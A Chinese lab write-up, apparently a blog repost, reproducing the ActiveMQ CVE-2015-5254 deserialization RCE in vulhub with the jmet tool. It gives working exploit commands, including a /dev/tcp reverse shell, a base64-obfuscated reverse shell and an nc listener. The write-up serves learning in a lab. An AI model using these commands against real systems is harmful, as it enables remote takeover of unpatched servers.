栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

vulhub漏洞复现-ActiveMQ(CVE-2015-5254)反序列化漏洞及任意命令执行漏洞

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulhub漏洞复现-ActiveMQ(CVE-2015-5254)反序列化漏洞及任意命令执行漏洞

Apache ActiveMQ

一个纯java的消息中间件程序,5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码,但复现时我们是利用现成的工具(jmet-0.1.0-all.jar)直接去打,所以我们只需去修改需要执行的命令即可。

复现

下载工具

jmet是利用ysoserial(集合了各种java反序列化payload)去构造生成payload

命令执行创建文件

在jar存在的目录下运行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/test" -Yp ROME vulhub.yster.live 61616


运行成功,在http://vulhub.yster.live:8161/admin/browse.jsp?JMSDestination=event查看事件,点击事件ID即运行成功

进入容器查看是否执行成功

docker ps
docker exec -it <容器id> bash
docker exec 的-it操作

nc连接反弹shell

替换touch /tmp/test为bash反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/ip/7777 0>&1" -Yp ROME  vulhub.yster.live 61616

因为java的机制所以要对命令进行base64加密?但是网上许多有的是不加密也可以连接成功,有的是加密了也连接不上。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjEyOC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME vulhub.yster.live 61616

打开nc监听

nc -lvp 1234
转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/272294.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号